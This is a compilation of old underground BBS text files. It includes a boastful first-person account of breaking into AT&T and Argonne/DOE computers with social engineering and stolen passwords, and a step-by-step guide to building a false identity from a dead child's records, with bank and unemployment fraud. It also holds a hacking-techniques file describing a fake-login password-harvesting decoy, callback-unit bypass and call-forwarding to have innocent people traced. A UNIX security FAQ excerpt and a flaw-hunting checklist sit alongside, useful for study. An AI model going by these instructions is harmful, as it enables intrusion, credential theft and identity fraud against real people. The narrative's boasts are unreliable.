        how many AT&T Satellites were up there.  So Dr.Antristo & I were
        going to find out the following night.

        Happy Holloween.....<Evil Grin>

        On November 1st, 1988 we Called AT&T.  We were buzzed off of the
        24pack of Jolt we had imbibed.  After connection to the Loop number
        we dialed into the Corperate office of AT&T and were actually given
        a command prompt, (after a COLORFUL Ascii Screen...Yeah...Right.)
        The AT&T Logo was proudly displayed onto our moniter, but we thought,
        with their appearant lack of security, that Pride was False.
        We typed in the Password and it told us that it required a name for
        "Security" reasons.  We dug up a name and fed it into the Computer.
        After verification of that employee, (NEVER put your full name on
        stationairy!) it gave us access into the System.  I thumbed through
        some small records and such.  Nothing much to get in the way of 
        records, or options.  I decided to look into the system a bit
        further.  After nosing through some Menus, I found a "Doorway" to
        the larger system.  The way AT&T was, it was a bunch of smaller 
        computers all hooked into one another by a bigger system.  I was
        merely in one of the smaller appendages.  I wanted the big guy!
        I opened the door and was system transferred to a larger net, where
        it showed scheduled Payrolls, Pink Slip notices, Active Staff Members
        , and a monstrofic listing of people who were behind on their 
        payments.  Jackpot!  Or so I thought.  No where could I find anything
        on AT&T Satellites, or the such.  I couldn't fix any of the payrolls
        or even reprieve people from getting the ever-more-noticable Pink 
        Slip.  (I still think American Companies are penny pinchers for 
        looking elsewhere for their SLAVE LABOUR)
        I sat there looking through the People lists, looking for a higher
        up so I could "Borrow" his name...heh heh.
        I couldn't locate the main file area for any of the larger ups', 
        so I logged off for the evening. I would find out later.  The Doc
        had an idea that would require skilful planning and cunning. I
        counted myself in.  So there we were at 3:35 the next day, standing
        on a corner, on a pay phone, talking to the operater.  We told the
        nice lady we were late for an appointment with Director of Operations
        and that we needed to reschedule our time, and after several minutes
        of chatting with the nice lady, I told her I was putting his name
        down in my appointment book, and I needed it spelled correctly, so
        She and I went through the spelling of the Director of Ops.  :) 
        I laughed as we wrote it down, little would this girl know what
        were up to!
        After chatting for a few minutes, I disconnected and Dr.Antristo
        and I went home.  We began to talk about how we were going to get
        in, as well as what we would do when we had access.  He didn't know
        and neither did I.  I guessed we'd have'ta figure it out when we
        got there.  School homework was completed on time, (I STILL think
        that its a waste) and we both had dinner with our respective in-
        mates.  (What would you call a family that no longer cared?)
        Evening rolled around, we were both a bit tired, so we were going
        to make this quick...We dialed into the Loop Number and then into 
        the little number our Hacker buddy gave us.  After we were in, I
        opened the Doorway and entered the main area.  After scanning the
        place for new info, I used the fellows name and opened myself to
        a world of new possibilites.  I found myself able to rearrange small
        lists of people, reverse pink slips, etc...  I was in!
        I checked out some of those pink slips and read up.  I was horrified
        to find that some of these people were being canned because they 
        were in their 40's?!?  I looked for who was responsible for signing
        these Slips, and to my utter amazement it was the guy who I was
        impersonating!  Well, I, being the better part of this guys 
        conscience, decided to fix what I broke!  I reversed several of the
        pink slips and gave one to this bastard!  (Someone out there owes me
        there job! :) )
        After dawdling with the Pink Slips, I went to check out other
        areas of the company.  I managed to worm my way into the Special
        sections, like who could order what.  Private lines for other
        companies, Tracing Codes, and Satellites.  I couldn't access the
        Satellites, but I managed to print Screen the Private Phone Lines
        of other companies, (and I STILL have them) and I found a real cute
        doorway...it was to emergency areas.  Example, A master program for
        the termination of the Chicagoland area.  I liked that.  I could
        axe Communtication on 3.2 million people in a mircosecond.  hahaha!
        I didn't, of course.  I went ahead and logged out.  I felt very 
        good about the things I had done.  If there is a God, he must have
        been thinking about that moment.  I know that most people out there
        who are Hackers or want to Hack, I know it is hard to believe, but
        should you ever be in the position I am, you'd understand why I 
        did what I did.  I never asked for forgiveness, as a matter of fact,
        I don't want it.  I was aware of what I was doing, and I enjoyed it.
        Anyways...Dr.Antristo had told me that the Department of Defence was
        offering contracts to Fermi Labs, and to Argonne on the Star Wars
        Space Project, and that we should look into it.  I liked that idea,
        but the government?  Geez...
        I thought about it for all of a month.  In that time I hacked a 
        large number of places, Mircosoft, IBM (again), Sears, Texaco,
        Illinois Bell, Wisconsin Bell, Prudental, My High School, (Everyone
        has done it, admit it), Martin Marrettia, and Jet Propultion Lab-
        rotories, (if you don't know what the last 2 are, STOP READING!)
        I had enough stuff that if I sold half of it, I could retire at the
        ripe age of 16!  But even thought our government holds out on us,
        and lies, steals, and keeps secrets, I still love it.  This is the
        land of the free.....NOT!!!

        December 3rd, 1988

        I was at home watching some christmas shopping commercials and 
        drinking a Jolt, when I recieved a phone call from my buddy
        Dr.Antristo.  He told me that Argonne had gotten the project and 
        that someone I knew was the project manager.  The Password was
        Anti-RX...?!?  I sighed and said what the hell, why not.  Lets
        see what our wonderful government is up to now.
        After a little bit of looking into it, I found out that yes indeed
        someone I knew was into the project.  I also found out that as of
        1988-89 Star Wars was not...35% complete, but a whopping 87%.  The
        only thing left to "Shunt" into orbit was a weapon called the 
        Wiggler beam.  A laser which concentrated high speed X-rays into 
        a focused stream, resulting in a laser so powerful it would 
        litterly slice incoming missiles in half.  I didn't care what the
        thing could do, this was good information.  I liked it, so I got
        onto Argonne National Labrotories Crey computer using a stolen
        password and copied the plans to an undisclosed location for later
        retrival.
        Dr.Antristo told me to goto the Department of Energy, you know, the
        bigwigs with no dicks, who push everyone whom they consider beneith
        them around to make their things for them.  (Wussies)  I went from
        the Crey to the main computer terminal of the D.O.E. and looked 
        around for a bit.  I found something I know all you will just love, 
        a small article of information indicating after shipping out 265
        "Pink Slips" that Article 130a, said that they (all the brass at the
        D.O.E. were going to give themselves some raises) oh my, how cute.
        Well, after looking around in the D.O.E. area, I quickly shut off
        the computer and terminated the connection when I heard my all-
        powerful Father come down the stairs to talk to me.  Whew!

How To Create A New Indentity                    By The Walking Glitch
                     Courtesy of the Jolly Roger!

You might be saying, "Hey Glitch, what do I need a new identity for?"
The answer is simple. You might want to go buy liquor somewhere, right?
You might want to go give the cops the false name when you get busted
so you keep your good name, eh?  You might even want to use the new
identity for getting a P.O. Box for carding. Sure! You might even
want the stuff for renting yourself a VCR at some dickless loser of a
convenience store. Here we go:
Getting a new ID isn't always easy, no one said it would be. By following
these steps, any bozo can become a new bozo in a coupla weeks.

STEP 1

The first step is to find out who exactly you'll become. The
most secure way is to use someone's ID who doesn't use it themselves.
The people who fit that bill the best are dead. As an added bonus they
don't go complaining one bit. Go to the library and look
through old death notices. You have to find someone who was born about
the same time as you were, or better yet, a year or two older
so you can buy booze, etc. You should go back as far as you can for the
death because most states now cross index deaths to births so people
can't do this in the future. The cutoff date in Wisconsin is 1979, folks
in this grand state gotta look in 1978 or earlier. Anything earier there
is cool. Now, this is the hardest part if you're younger. Brats that
young happen to be quite resilient, takin' falls out of three story windows
and eating rat poison like its Easter candy, and not a scratch or
dent. There ain't many that die, so ya gotta look your ass off. Go
down to the library and look up all the death notices you can,
if it's on microfilm so much the better. You might have to go through
months of death notices though, but the results are well worth it.
You gotta get someone who died locally in most instances: the death
certificate is filed only in the county of death. Now you go down to
the county courthouse in the county where he died and get the
death certificate, this will cost you around $3-$5 depending on the state
you're in. Look at this hunk of paper, it could be your way to
vanish in a clould of smoke when the right time comes, like right after
that big scam. If You're lucky, the slobs parents signed him up with
social security when he was a snot nosed brat. That'll be another piece
of ID you can get. If not, thats ok too. It'll be listed on the death
certificate if he has one. If you're lucky, the stiff was born
locally and you can get his birth certificate right away.

STEP 2

Now check the place of birth on the death certificate, if it's in
the same place you standing now you're all set. If not, you can mail
away for one from that county but its a minor pain and it might
take a while to get, the librarian at the desk has listings of where
to write for this stuff and exactly how much it costs. Get the Birth
cirtificate, its worth the extra money to get it certified
because thats the only way some people will accept it for ID. When yur
gettin this stuff the little forms ask for the reason you want it,
instead of writing in "Fuck you", try putting in the word "Geneology".
They get this all the time.  If the Death certificate looks good for
you, wait a day or so before getting the certified birth certificate
in case they recognize someone wanting it for a dead guy.

STEP 3

Now your cookin! You got your start and the next part's easy.
Crank out your old Dot matrix printer and run off some mailing labels
addressed to you at some phony address. Take the time to check your
phony address that there is such a place. Hotels that rent by the month
or large apartment buildings are good, be sure to get the right zip
code for the area. These are things that the cops might notice that
will trip you up.  Grab some old junk mail and paste your new lables
on them. Now take them along with the birth certificate down to the library.
Get a new library card. If they ask you if you had one before say that
you really aren't sure because your family moved around alot when
you were a kid. Most libraries will allow you to use letters as a form
of ID when you get your card. If they want more give them a sob story
about how you were mugged and got your wallet stolen with all your
identification. Your card should be waiting for you in about two weeks.
Most libraries ask for two forms of ID, one can be your trusty Birth
Certificate, and they do allow letters addressed to you as a second
form.

STEP 4

Now you got a start, it isn't perfect yet, so let's continue. You should
have two forms of ID now. Throw away the old letters, or better yet
stuff them inside the wallet you intend to use with this stuff.
Go to the county courthouse and show them what nice ID you got and get
a state ID card. Now you got a picture ID. This will take about two weeks
and cost about $5, its well worth it.

STEP 5

If the death certificate had a social security number on it you can go
out and buy one of those metal SS# cards that they sell.
If it didn't, then you got all kinds of pretty ID that shows exactly
who you are. If you don't yet have an SS#, Go down and apply for one,
these are free but they could take five or six weeks to get,
Bureaucrats you know... You can invent a SS# too if ya like, but the motto
of 'THE WALKING GLITCH' has always been "Why not excellence?".

STEP 6

If you want to go whole hog you can now get a bank account in your new
name.  If you plan to do alot of traveling then you can put alot
of money in the account and then say you lost the account book.  After
you get the new book you take out all the cash. They'll hit you
with a slight charge and maybe tie-up your money some, but if you're
ever broke in some small town that bank book will keep you from being
thrown in jail as a vagrant.

ALL DONE?

So kiddies, you got ID for buying booze, but what else? In some towns
(the larger the more likely) the cops if they catch you for something
petty like shoplifting stuff under a certain dollar amount, will just
give you a ticket, same thing for pissing in the street. Thats it!
No fingerprints or nothing, just pay the fine (almost always over $100)
or appear in court.  Of course they run a radio check on your ID, you'll
be clean and your alter-ego gets a blot on his record.
Your free and clear.  Thats worth the price of the trouble you've gone
through right there.  If your smart, you'll toss that ID away if this
happens, or better yet, tear off your picture and give the ID to someone
you don't like, maybe they'll get busted with it.
If you're a working stiff, here's a way to stretch your dollar. Go to work
for as long as it takes to get unemployment and then get yourself fired.
Go to work under the other name while your getting the unemployment.
With a couple of sets of ID, you can live like a king.  These concepts
for survival in the new age come to you compliments of THE WALKING GLITCH.
First release of this phile 7/7/88.

                      brought to you in the Cookbook courtesy of...
                                       ---------------The Jolly Roger



From: Manifestation
Subject: Security holes manifest themselves in (broadly) four ways...
Date: 11.10.93

( Please contribute by sending E-Mail to <scott@santafe.edu> ... )

[quoting from the comp.security.unix FAQ]
Security holes manifest themselves in (broadly) four ways:

1) Physical Security Holes.

- Where the potential problem is caused by giving unauthorised persons
physical access to the machine, where this might allow them to perform
things that they shouldn't be able to do.

A good example of this would be a public workstation room where it would
be trivial for a user to reboot a machine into single-user mode and muck
around with the workstation filestore, if precautions are not taken.

Another example of this is the need to restrict access to confidential
backup tapes, which may (otherwise) be read by any user with access to
the tapes and a tape drive, whether they are meant to have permission or
not.

2) Software Security Holes

- Where the problem is caused by badly written items of "privledged"
software (daemons, cronjobs) which can be compromised into doing things
which they shouldn't oughta.

The most famous example of this is the "sendmail debug" hole (see
bibliography) which would enable a cracker to bootstrap a "root" shell.
This could be used to delete your filestore, create a new account, copy
your password file, anything.

(Contrary to popular opinion, crack attacks via sendmail were not just
restricted to the infamous "Internet Worm" - any cracker could do this
by using "telnet" to port 25 on the target machine.  The story behind a
similar hole (this time in the EMACS "move-mail" software) is described
in [Stoll].)

New holes like this appear all the time, and your best hopes are to:

  a: try to structure your system so that as little software as possible
  runs with root/daemon/bin privileges, and that which does is known to
  be robust.

  b: subscribe to a mailing list which can get details of problems
  and/or fixes out to you as quickly as possible, and then ACT when you
  receive information.

>From: Wes Morgan <morgan@edu.uky.ms>
>
> c: When installing/upgrading a given system, try to install/enable only
> those software packages for which you have an immediate or foreseeable
> need.  Many packages include daemons or utilities which can reveal
> information to outsiders.  For instance, AT&T System V Unix' accounting
> package includes acctcom(1), which will (by default) allow any user to
> review the daily accounting data for any other user.  Many TCP/IP packa-
> ges automatically install/run programs such as rwhod, fingerd, and
> <occasionally> tftpd, all of which can present security problems.
>
> Careful system administration is the solution.  Most of these programs
> are initialized/started at boot time; you may wish to modify your boot
> scripts (usually in the /etc, /etc/rc, /etc/rcX.d directories) to pre-
> vent their execution.  You may wish to remove some utilities completely.
> For some utilities, a simple chmod(1) can prevent access from unauthorized
> users.
>
> In summary, DON'T TRUST INSTALLATION SCRIPTS/PROGRAMS!  Such facilities
> tend to install/run everything in the package without asking you.  Most
> installation documentation includes lists of "the programs included in
> this package"; be sure to review it.

3) Incompatible Usage Security Holes

- Where, through lack of experience, or no fault of his/her own, the
System Manager assembles a combination of hardware and software which
when used as a system is seriously flawed from a security point of view.
It is the incompatibility of trying to do two unconnected but useful
things which creates the security hole.

Problems like this are a pain to find once a system is set up and
running, so it is better to build your system with them in mind.  It's
never too late to have a rethink, though.

Some examples are detailed below; let's not go into them here, it would
only spoil the surprise.

4) Choosing a suitable security philosophy and maintaining it.

>From: Gene Spafford <spaf@cs.purdue.edu>
>The fourth kind of security problem is one of perception and
>understanding.  Perfect software, protected hardware, and compatible
>components don't work unless you have selected an appropriate security
>policy and turned on the parts of your system that enforce it.  Having
>the best password mechanism in the world is worthless if your users
>think that their login name backwards is a good password! Security is
>relative to a policy (or set of policies) and the operation of a system
>in conformance with that policy.

---

From: Hacking
Subject: Hacking Ideas
Date: 11/10/93

( Please contribute by sending E-Mail to <scott@santafe.edu> ... )

[ Many ideas taken from: HaxNet - APG V1.3 : Guide to finding new holes]

NOTE: I think this should be divided into general categories:
1) General principles
2) Looking for holes in src (most items here)
3) Looking in binary distributions
4) Looking in site specific configurations

  The following general classifications suggest themselves:
1) SUID/SGID
2) Return codes/error conditions
3) unexpected input
4) race conditions
5) authentication
6) implicit trust
7) parameters
8) permissions
9) interrupts
10) I/O
11) symbolic links
12) Daemons, particularly those taking user input.
13) Kernel race conditions
14) what else? - please add categories

(Suggested splitting of above into main and sub-catagories)
I:   Suid binaries and scripts
     unexpected user interactions
     flawed liberary calls
     implicit assumptions of external conditions (sym links, loc. paths)
     race conditions
II:  daemons running with priviliged uid's
     race conditions
     poor file protectons
     implicit file protections
     trust
     authentication
III: Kernel problems
     Kernel race conditions
     device driver code

The following four step method was created by System Development
Corporation, who report a 65% success rate on the flaw hypotheses
generated.  Doing a comprehensive search for operating system flaws
requires four steps:

Step 1) Knowledge of system control structure.
===============================================
  To find security holes, and identifying design weaknesses it is
necessary to understand the system control structure, and layers.
  One should be able to list the:
A) security objects: items to be protected. ie: a users file.
B) control objects: items that protect security objects. ie: a i-node
C) mutual objects  : objects in both classes. ie: the password file
  With such a list, it is possible to graphically represent a control
hierarchy and identify potential points of attack. Making flow charts
to give a visual breakdown of relationships definitely helps.
  Reading the various users, operators, and administrators manuals should
provide this information.
(following para's should probably be moved to a "legal" section)
  Reading and greping source code should also prove valuable. For those
without a source licence, I would suggest we use LINUX, NET2, and BSD386
distributions in order to stay legal. At some future time we may be able
to form a working contract between someone or a company with legal access
to other distributions and members actively participating in this project.
  It appears that extracts of proprietary code may be used for academic
study, so long as they are not reused in a commercial product - more
checking is necessary though.

Step 2) Generate an inventory of suspected flaws. (i.e. flaw hypotheses)
========================================================================
In particular we want:
  Code history:
    What UNIX src does a particular flavor derive from? This is important
for cross references (very often only one vendor patches certain code,
which may get reused, in it's unpatched reincarnation by others)
  A solid cross reference:
    Who checked which bug in what OS and what version prevents us from
duplicating work.

  A good start would be listing all the suid binaries on the various OS
flavors/versions. Then try to work out why each program is suid. i.e.:
    rcp is suid root because it must use a privilaged port to do user
    name authentication.
  Often code that was never designed to be suid, is made suid, durring
porting to solve file access problems.
  We need to develope a data base that will be able to look at pairs and
triplets of data, specificly: program name, suid, sgid, object accessed
(why prog is suid/sgid), OS flavor/version, and flav/vers geniology.
  Any sugestions on how to implement such a DB?

Step 3) Confirm hypotheses. (test and exploit flaws)
====================================================

Step 4) Make generalizations of the underlying system weaknesses, for
        which the flaw represents a specific instance.
=====================================================================

Tool Box:
=========
AGREP: I suggest everyone obtain, and install agrep from:
    ftp cs.arizona.edu /agrep/agrep.tar.Z
  Agrep supports "windowing" so it can look for routines, and subroutines.
It also supports logical operators and is thus ideally suited to automating
the search for many of the following flaws. i.e. <psudocode>
      agrep WINDOW {suid() NOT taintperl()} /usr/local/*.pl
or    agrep WINDOW {[suid() OR sgid()] AND [system() OR popen() OR execlp()
            OR execvp()]} /usr/local/src/*.c

PERMUTATION PROGRAM: Another tool worth producing is a program to generate
all possible permutations of command line flags/arguments in order to uncover
undocumented features, and try to produce errors.

TCOV:

CRASH: Posted to USENET (what FTP archive?) (descrip?)

PAPERS: There are several papers that discuss methods of finding flaws, and
  present test suites.
  1) An Emphirical Study of the reliability of UNIX Utilities, by Barton P.
    Miller, Lars Fredriksen, and Bryan So, Comm ACM, v33 n12, pp32-44,
    Dec '90. Describes a test suite for testing random input strings.
    Results indicated that 25% of the programs hung, crashed, or misbehaved.
    In one case the OS crashed. An understanding of buffer and register
    layout on the environment in question, and the expected input is likely
    to produce the desired results.
  2) The Mothra tools set, in Proceedings of the 22nd Hawaii International
    Conference on Systems and Software, pages 275-284, Kona, HI, January '89
  3) Extending Mutation Testing to Find Environmental Bugs, by Eugene H.
    Spafford, Software Practice and Experience, 20(2):181-189, Feb '90
  4) A paper by IBM was mentioned that was submitted to USENIX a few years
    ago. (Anyone have a citation?).

Specific Flaws to Check For:
============================
1) Look for routines that don't do boundary checking, or verify input.
   ie: the gets() family of routines, where it is possible to overwrite
   buffer boundaries. ( sprintf()?, gets(), etc. )
   also: strcpy() which is why most src has:
     #define SCYPYN((a)(b)) strcpy(a, b, sizeof(a))

2) SUID/SGID routines written in one of the shells, instead of C or
   PERL.

3) SUID/SGID routines written in PERL that don't use the "taintperl"
   program.)

4) SUID/SGID routines that use the system(), popen(), execlp(), or
   execvp() calls to run something else.

5) Any program that uses relative path names inside the program.

6) The use of relative path names to specify dynamically linked libraries.
   (look in Makefile).

7) Routines that don't check error return codes from system calls. (ie:
   fork(2), suid(2), etc), setuid() rather, as in the famous rcp bug

8) Holes can often be found in code that:
  A) is ported to a new environment.
  B) receives unexpected input.
  C) interacts with other local software.
  D) accesses system files like passwd, L.sys, etc.
  E) reads input from a publicly writable file/directory.
  F) diagnostic programs which are typically not user-proofed.

9) Test code for unexpected input. Coverage, data flow, and mutation
   testing tools are available.

10) Look in man pages, and users guides for warnings against doing X, and
   try variations of X. Ditto for "bugs" section.

11) Look for seldom used, or unusual functions or commands - read backwards.
   In particular looking for undocumented flags/arguments may prove useful.
   Check flags that were in prior releases, or in other OS versions. Check
   for options that other programs might use. For instance telnet uses -h
   option to login ...
     right, as most login.c's I've seen have:
          if((getuid()) && hflag){
                 syslog()
                 exit()
                 }

12) Look for race conditions.

13) Failure of software to authenticate that it is really communicating
   with the desired software or hardware module it wants to be accessing.

14) Lack or error detection to reset protection mechanisms following an
   error.

15) Poor implementation resulting in, for example, condition codes being
   improperly tested.

16) Implicit trust: Routine B assumes routine A's parameters are correct
   because routine A is a system process.

17) System stores it's data or references user parameters in the users
   address space.

18) Inter process communication: return conditions (passwd OK, illegal
   parameter, segment error, etc) can provide a significant wedge, esp.
   when combined with (17).

19) User parameters may not be adequately checked.

20) Addresses that overlap or refer to system areas.

21) Condition code checks may be omitted.

22) Failure to anticipate unusual or extraordinary parameters.

23) Look for system levels where the modules involved were written by
   different programmers, or groups of programmers - holes are likely
   to be found.

24) Registers that point to the location of a parameters value instead
   of passing the value itself.

25) Any program running with system privileges. (too many progs are given
   uid 0, to facilitate access to certain tables, etc.)

26) Group or world readable temporary files, buffers, etc.

27) Lack of threshold values, and lack of logging/notification once these
   have been triggered.

28) Changing parameters of critical system areas prior to their execution
   by a concurrent process. (race conditions)

29) Inadequate boundary checking at compile time, for example, a user
   may be able to execute machine code disguised as data in a data area.
   (if text and data areas are shared)

30) Improperly handling user generated asynchronous interrupts. Users
   interrupting a process, performing an operation, and either returning
   to continue the process or begin another will frequently leave the
   system in an unprotected state. Partially written files are left open,
   improper writing of protection infraction messages, improper setting
   of protection bits, etc often occur.

31) Code that uses fopen(3) without setting the umask. ( eg: at(1), etc. )
  In general, code that does not reset the real and effective uid before
  forking.

32) Trace is your friend (or truss in SVR4) for helping figure out what
  system calls a program is using.

33) Scan /usr/local fs's closely. Many admins will install software from
  the net. Often you'll find tcpdump, top, nfswatch, ... suid'd root for
  their ease of use.

34) Check suid programs to see if they are the ones originally put on the
  system. Admins will sometimes put in a passwd replacement which is less
  secure than the distributed version.

35) Look for programs that were there to install software or loadable
  kernel modules.

36) Dynamically linked programs in general. Remember LD_PRELOAD, I think
  that was the variable.

37) I/O channel programming is a prime target. Look for logical errors,
  inconsistencies, and omissions.

38) See if it's possible for a I/O channel program to modify itself, loop
  back, and then execute the newly modified code. (instruction pre-load
  may screw this up)

39) If I/O channels act as independent processors they may have unlimited
  access to memory, thus system code may be modified in memory prior to
  execution.

40) Look for bugs requiring flaws in multiple pieces of software, i.e. say
  program a can be used to change config file /etc/a now program b assumes
  the information in a to be correct and this leads to unexpected results
  (just look at how many programs trust /etc/utmp)

41) Any program, especially those suid/sgid, that allow shell escapes.





 
****************************
***  HACKING TECHNIQUES  ***
***  Typed By:  LOGAN-5  ***
***   (Hacker Supreme)   ***
***       From the       ***
***   Inner Circle Book  ***
****************************
 
1) CALLBACK UNITS:
 
Callback units are a good security device, But with most phone systems,
it is quite possible for the hacker to use the following steps to get
around a callback unit that uses the same phone line for both incomming 
and out going calls:First, he calls he callback unit and enters any 
authorized ID code (this is not hard to get,as you'll see in a moment).
After he enters this ID, the hacker holds the phone line open - he does 
not hang up. When the callback unit picks up the phone to call the user back,
the hacker is there, waiting to meet it.
 
 The ID code as I said, is simple for a hacker to obtain, because these 
codes are not meant to be security precautions.The callback unit itself 
provides security by keeping incomming calls from reaching the computer.
The ID codes are no more private than most telephone numbers. Some callback 
units refer to the codes as "location identification numbers," and some 
locations are used by several different people,so their IDs are fairly 
well known.I've been told that, in some cases,callback ubits also have 
certain simple codes that are always defined by default. Once the hacker 
has entered an ID code and the callback unit has picked up the phone to 
re-call him,the hacker may or may not decide to provide a dial tone to 
allow the unit to "think" it is calling the correct number. In any event,
the hacker will then turn on his computer, connect with the system - and 
away he goes.If the however, the hacker has trouble holding the line with 
method,he has an option: the intercept.
 
The Intercept: 
 Holding the line will only work with callback units that use the same 
phone lines to call in and to call out.Some callback units use different
incoming and outgoing lines, numbers 555-3820 through 555-3830 are dedicated 
to users' incoming calls, and lines 555-2020 through 555-2030 are dedicated 
to the computers outgoing calls.The only thing a hacker needs in order to 
get through to these systems is a computer and a little time - he doesn't 
even need an ID code. First,the hacker calls any one of the outgoing phone 
lines, which, of course, will not answer.Sooner or later, though, while the 
hacker has his computer waiting there, listening to the ring, an authorized 
user will call one of the incomming lines and request to be called back.
It will usually be less than an hours wait, but the hacker's computer 
is perfectly capable of waiting for days, if need be.
 
 The callback unit will take the code of the authorized user, hang up, 
verify the code, and pick up the phone line to call back.If the unit 
tries to call out on the line the hacker has dialed, the hacker has his 
computer play a tone that sounds just like a dial tone.The computer will 
then dial the number given that matches up with the user's authorized ID.
After that,the hacker can just connect his computer as he would in any 
other case.If he is really serious,he will even decode the touch tones 
that the mainframe dialed,figure out the phone number of the user the 
system was calling, call the person, and make a few strange noises that 
sound as though the computer called back but didnt work for some reason.
 
2) TRAPDOORS AS A POSSIBLILITY
 
 I haven't heard of this happening, but i think it is possible that a 
callback modem could have a trapdoor built into it.Callback modems are
run by software, which is written by programmers.An unscrupulous programmer 
could find it very easy to slip in an unpublicized routine, such as, 
"if code =*43*, then show all valid codes and phone numbers." And such a 
routine, of course, would leave security wide open to anyone who found the 
trapdoor.The obvious protection here, assuming the situation ever arises,
is simply an ethical manufactorer that checks its software thoroughly before 
releasing it.
 
 A trapdoor is a set of special instructions embedded in the large 
program that is the operating system of a computer.A permanent, 
hopefully secret "doorway", these special instructions enabe anyone who 
knows about them to bypass normal security procedures and to gain access to 
the computer's files.Although they may sound sinister, trapdoors were not 
invented by hackers, although existing ones are certainly used by hackers 
who find out about them.
 
3) THE DECOY
 
 One of the more sophisticated hacking tools is known as the decoy, and it 
comes in three versions.The first version requires that the hacker have an 
account on the system in question. As in my case,the hacker has a 
low-security account,and he tries this method to get higher-security 
account.He will first use his low-security account to write a program that 
will emulate the log-on procedures of the systems in questions. 
This program will do the following:
 
*- Clear the terminal screen and place text on it that makes everything 
look as if the system is in charge.
 
*- Prompt for, and allow the user to enter, both an account name and a password.
*- Save that information in a place the hacker can access.
 
*- Tell the use the account/password entries are not acceptable.
 
*- turn control of the terminal back over to the system.
 
The user will now assume that the account name or password was mistyped 
and will try again...this time (scince the real operating system is in 
control) with more success.You can see a diagram of the way these steps are 
accomplished
 
 ___________________   
 |   Clear Terminal   |
 |       screen       |
 |____________________|
           ||
  _________||_________
 |  Print Compuserve  |
 |      Computer      |
 |_____ Network ______|
           ||
  _________||_________
 |   Print "ENTER     |
 |     PASSWORD"      |______
 |____________________|      |
          ||                 |
 _________||_________        |
 |  PASSWORD ENTERED? |__NO__|
 |____________________|   
          ||_YES
 _________||_________
 |   SAVE PASSWORD    |
 |    INFORMATION     |
 |____________________|
          ||
 _________||_________
 |   PRINT "LOGIN     |
 |     INCORRECT      |
 |____________________|
          ||
 _________||_________
|   LOG OFF/RETURN   |
|    CONTROL TO      |
|  OPERATING SYSTEM  |
|____________________|
 
 4) CALL FORWARDING
 
 Many people use call forwarding by special arrangement with the phone 
company.When a customer requests call forwarding, the phone company uses 
its computer to forward all the customers incomeing calls to another 
number. Lets say, for example, that you want calls that come to your office 
phone to be forwarded to your home phone: A call from you to the phone 
company,some special settings in the phone companys computer, and all 
calls to your office will ring at your home instead.This little bit of help 
from the phone company is another tool used by hackers. Lets say you thought 
that the computer you were hacking into was being watched-because the 
sysop might have seen you and called the fed's and your sort of bugged by 
this nagging feeling that they will trace the next hacker that calls, 
just call the phone company and ask for call forwarding, pick a number, 
(ANY NUMBER) out of the phone book and have your calls forwarded to that 
number,Hea,Hea, the number you picked is the one that will be traced to,
not yours, so you could be hacking away,they think that they have traced you, 
but actually the number you had your calls forwarded too. they enter chat mode
and say (YOUR BUSTED!!!!, WE'VE TRACED YOUR PHONE NUMER THE FEDS ARE ON THE 
WAY!!), You could reply (Hea, SURE YA DID! I'D LIKE TO SEE YA TRY AND GET ME! 
GO AHEAD!) ,that wont seem very important to them at the time, but it will 
sure piss them off when they bust the wrong guy!  
 
5) RAPID FIRE
 
 Memory-location manipulation can be helpful, but there is another, more 
powerful,possibility, in some cases: the Rapid-fire method.To understand how 
this methos works, you have to know something about the way operationg 
systems work.When a user enters a command, the operating system first places 
the command in a holding area, a buffer, where it will sit for a few 
millionths of a second.The system looks at the command and say's "Does this 
person really have authorization to do this, or not?" Then, the command 
sits there a few thousandths of a second while the system runs off to 
check the user's authorization.When the system comes back to the command, 
it will have one of two possible answers: "OK, GO AHEAD," or "SORRY, 
GET PERMISSION FIRST."
 
 Once you are on a system that handles things this way, you can use the 
rapid-fire method to change the command while its sitting in the buffer,
waiting to be executed. If you can do this,you can do anything.You can enter 
a command that you know will be approved, such as "tell me the time." As soon 
as the system runs off to verify your right to know the time,you change 
the command in the buffer to something you know would not be approved-perhaps
"give me a list of all the passwords." When the system comes back with an 
"OK, go ahead," it responds to your second command, not the first. Of course,
this exchange has to be done very rapidly,but most systems existing today 
can be fooled by this trick. The question is,how easy is it to do, and how 
much authority do you need? I know of one system that let this one slip.
 
These are certainly not all the hacker's little secret tricks and tool's,
You will probably figure out some better, more efficiant,hacking techniques.
 
GOOD LUCK!!!!!!
L O G A N - 5
<------------------------------------------------>
 

                                           
                       .... Composite Rocket Fuels ....
                         



DISCLAIMER: The following file contains information of harmful or illegal
            nature. Neither the BBS or author providing this information
            can be considered responsible for the use of this file.
            The person using this knowledge is solely responsible for 
            it's use or misuse. This file is intended to educate only.


             
                             1.) Introduction
                              
Composite propellants are solid rocket fuels that are composed of separate
fuels and oxidizers mixed together in one homogenous mass. This propellant
is then either molded into a grain to be inserted in an engine or cast in an
engine casing and left to harden. The fuels and oxidizers taken separately
are generally unreactive. Composite propellants are used in a number of
engines. There are engines that use water for fuel and an oxidizer, air for
an oxidizer like a ramjet, and a liquid/solid engine that can be throttled. 
The rocket motors discussed here a best built by the amateur with propellant
weights below 2 lbs. and preferably under 1 lb. This is still powerful enough
to shoot a sizable rocket to well over 4 miles altitude.
Before I get into propellant mixtures a few terms to learn are:
  Specific Impulse - Defined as the impulse (force * time) delivered by
                     burning a unit weight of propellant in a rocket engine.
                     
  Volume Specific Impulse - The product of specific impulse and density. This
                            is expressed in pound-seconds per cubic inch.
                            If the propellant's weight is kept constant, a
                            propellant with a lower Isp but a higher density
                            may outperform one with a greater Isp but a
                            lower density.

  Specific Force - This is a measurement of the ability for a gas to perform
                 work. Specific force (F) is expressed in foot-pound per
                 pound.
                 

                            3.) OXIDIZERS

Composite propellants contain both an oxidizer and a fuel. The oxidizer may
be a monopropellant and as such contributes power to the propellant mix.
The ideal oxidizer should decompose into totally gaseous exhaust.

Oxidizers used in composite propellants : Potassium perchlorate (KClO4).
Potassium pechlorate was one of the first used oxidizers. One of it's draw-
backs is the product of decomposition ( potasium chloride ) is not a gas at
regular temperatures and does not contribute as a working gas. The KCl 
appears as a dense smoke in the rockets exhaust. Burning rates of propellants
made with KClO4 are usually high at 0.8 - 0.9 in/sec at 1000 PSI. Densities
of fuels made with KClO4 also tend to high at 1.8 - 2.0 gm/cc. Specific
impulses are usually below 200 lb-sec/lb. Potassium perchlorate is hardly
ever used im modern propellants.
Ammonium Perchlorate NH4ClO4. This is the oxidizer of choice when possible.
The products of diassociation of NH4ClO4 are 100% gas. The specific impulse
of propellants using this oxidizer reaches 250 lb-sec/lb. Depending on the 
percentage of NH4ClO4 the burning rate may reach or exceed 0.5 in/sec. The
